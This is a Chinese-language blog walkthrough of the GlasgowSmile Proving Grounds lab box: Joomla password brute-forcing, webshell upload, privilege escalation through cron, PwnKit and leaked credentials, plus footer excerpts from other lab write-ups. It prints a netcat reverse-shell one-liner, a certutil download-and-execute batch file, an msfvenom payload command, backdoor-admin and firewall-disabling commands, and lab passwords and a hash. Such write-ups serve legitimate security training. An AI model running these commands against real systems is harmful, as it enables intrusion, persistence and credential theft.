Proving Grounds Play : GlasgowSmile Walkthrough

-

 Proving Grounds Play : GlasgowSmile Walkthrough


Foothold :

  • 發現 CMS joomla,使用 cewl 製作密碼檔,猜測使用者帳號暴力破解進入 joomla
  • 確認是 joomla 管理者,利用修改 template 的 php 內容後成功利用拿到 Rverse Shell

PE :

  • PwnKit 後 root (這個非標準官方設計的路徑)
  • 真正 PE 真的很煩,枚舉後 pspy64 發現每分鐘固定執行 penguin 家目錄下的一個文件
  • 首先進入的 www-data 在 joomla 的 config 檔發現 MySQL 連線憑證
  • 登入 MySQL 發現 rob 使用者的密碼 HASH,接著切換使用者到 rob
  • rob 使用者 HOME 目錄有個用 ROT1 格式寫的檔案內容,解碼後得到使用者 abner 的密碼
  • 切換使用者 abner 後在 joomla 的檔案資料夾發現一個 zip 檔,一樣用 abner 的密碼解壓縮
  • 接著使用該密碼成功切換使用者 penguin,修改 pspy64 發現的固定執行檔案
  • 修改檔案內容寫入一個 root 使用者,切換該使用者後成功提權


Rustscan,└─$ rustscan -a 192.168.151.79 --scripts none --ulimit 5000 | tee rustscan



snmp check,└─$ sudo nmap -sU -p 161 192.168.151.79 | tee snmp



nmap,└─$ sudo nmap -sCV -A -p 22,80 192.168.151.79 | tee nmap



whatweb



80 /



80 /robots.txt



source code



gobuster 80 /,看到熟悉的 joomla



80 /joomla

發現一個使用者名稱 joker



80 /joomla/administrator

測試了幾組常用的帳號密碼都失敗



後續使用 cewl 製作密碼字典檔



開啟 Burp Suite 將帳號密碼登入送到 Intruder 然後設定密碼為參數



餵入字典檔開始攻擊測試



測試到密碼為 Gotham 時發現跳轉 303 且長度不一樣



使用憑證 joomla:Gotham 成功登入,且是 Super User (Administrator)



joomla 版本 3.7.3-rc1



點選左邊的 Templates



進入 Templates 頁面後點選 "protostar"



進入 Protostar 範本相關的 php 網頁中



將 index.php 換上最愛的 webshell.php 然後存檔



http://192.168.151.79/joomla/index.php 熟悉的畫面出現了,輸入 whoami 確認可以執行



直接最愛的 RM 建立 Reverse Shell

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.168 4444 >/tmp/f



獲取第一階段 flag,發現是放在使用者 rob 的家目錄



cat /etc/passwd,使用者 rob、abner、penguin



cat /etc/crontab



sudo -l 沒有結果,SUID check



pspy64 發現背景下使用者 penguin 每分鐘執行一次

/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old



linpeas 跑下去又見到熟悉的 PwnKit



直接 PwnKit 又 root 了,靠~~~~一定沒有這麼簡單,又是一個不鎖 PwnKit 的靶機



補充說明 :

回到一開始進入的路徑 /var/www/html/joomla 底下有一個 configuration.php

內容可以看到去連 MySQL 的憑證 joomla:babyjoker 還有一個 secret "fNRyp6KO51013435"



直接把機進入 MySQL DB 看看,有個特別的資料庫 batjoke,感覺進入蝙蝠俠靶機



有兩個 table equipment、taskforce,在 taskforce 中有名稱跟密碼欄位

將兩個欄位的值 show 出來看一下

+---------+----------------------------------------------+

| name    | pswd                                         |

+---------+----------------------------------------------+

| Bane    | YmFuZWlzaGVyZQ==                             |

| Aaron   | YWFyb25pc2hlcmU=                             |

| Carnage | Y2FybmFnZWlzaGVyZQ==                         |

| buster  | YnVzdGVyaXNoZXJlZmY=                         |

| rob     | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |

| aunt    | YXVudGlzIHRoZSBmdWNrIGhlcmU=                 |

+---------+----------------------------------------------+



僅有一個使用者名稱 rob 有在 linex 系統的使用者

將密碼 hash 丟到 hashes 得到密碼 "???AllIHaveAreNegativeThoughts???"



john 無法判斷 HASH 格式,但用 base64 可以解密,看來是 base64 的格式



用該密碼成功切換到使用者 rob



進到 rob 的家目錄,查看檔案 Abnerineedyourhelp 內容如下,完全看不懂這是啥鬼東西

Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."

Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==



枚舉後發現這是 ROT1 格式的編碼,透過 rot13.com 解碼如下

Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't."

Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==



穿插一段說明 ROT1,甚麼是 ROT1,簡單講就是英文字母右移一碼
ROT 是一種加密機制,以下是它的工作原理。 想像一下你有一個單字 "abcd" 
ROT1 就是將 "a" 替換為 "b",將 "b" 替換為 "c"
所以基本上它是將每個字母替換為後面一個字母來做為加密文
ROT2 就是將替換原始字母 "a" 為 "c","b" 為 "d " 等,字母比原始字母右移兩個
依此類推可以理解甚麼是 ROT3、ROT4 等加密方式
舉例說明 :
 - 原始內文 : abcd
 - ROT1 : bcde
 - ROT2 : cdef
 - ROT3 : defg
 - ROT4 : efgh
 - etc...



至於怎麼找出那是 ROT1 編碼的呢,當然是直接問 ChatGPT 最快




那一段密碼是標準的 base64,解密後如下

I33hope99my0death000makes44more8cents00than0my0life0



hydra 測試一下發現密碼真的就是那麼長



su abner 後成功切換到使用者 abner



在此路徑下 /var/www/joomla2/administrator/manifests/files 有一個檔案 .dear_penguins.zip

權限就是 abner 所有



用 python 起 HTTP Server 然後將檔案 http://192.168.151.79:8080/.dear_penguins.zip 抓回 kali



解壓縮需要密碼,用 john破解不了,後來是嘗試直接使用 abner 使用者的密碼解開,內容如下

My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!

scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz



使用該密碼成功切換使用者 penguin



終於進入到 pspy64 發現的背景執行資料夾 SomeoneWhoHidesBehindAMask/



使用最愛的手法寫一個 root 使用者 aries 到 /etc/passwd



等一會後確認 /etc/passwd 寫入該使用者 aries,su 切換使用者確認 root




留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容

Challenge 8 - Poseidon(0)

-
圖片
 Challenge 8 - Poseidon(0) 最近真的新的 LAB 連發,又多了一個 Challenge 8 : Poseidon 剛好近期有空,開來看看吧,又是一個三台的組合,應該又是 AD 題組 跟前一個題組 zeus 很像,都是三台面向使用者沒有內網的機器 ping 看看,看來三台都是 Windows Rustscan 掃掃看,看來第一台一樣是 DC └─$ rustscan -a 192.168.163.161 --scripts none --ulimit 5000 | tee rustscan 第二台看來也像 DC └─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第三台,└─$ rustscan -a 192.168.163.162 --scripts none --ulimit 5000 | tee rustscan 第一台 161 nmap 資訊 Domain : poseidon.yzx,電腦名稱 dc01 NetBIOS_Domain_Name : poseidon 第二台 162 nmap 資訊 這一台看來是 Sub Domain 的 DC,FQDN: dc02.sub.poseidon.yzx NetBIOS_Domain_Name : sub 第三台 163 nmap 資訊 ldapsearch 161,ldapsearch -v -x -b "DC=poseidon,DC=yzx" -H "ldap://192.168.163.161" "(objectclass=*)" ldapsearch 162,ldapsearch -v -x -b "DC=sub,DC=poseidon,DC=yzx" -H "ldap://192.168.163.162" "(objectclass=*)" 預設 smbclient 列舉都爬不到東西 帶入 poseidon\guest & sub\guest SMB 也都爬不到資訊 爬看看 161 Domain 的使用者,└─$ ./kerbrute_linux_amd64...
閱讀完整內容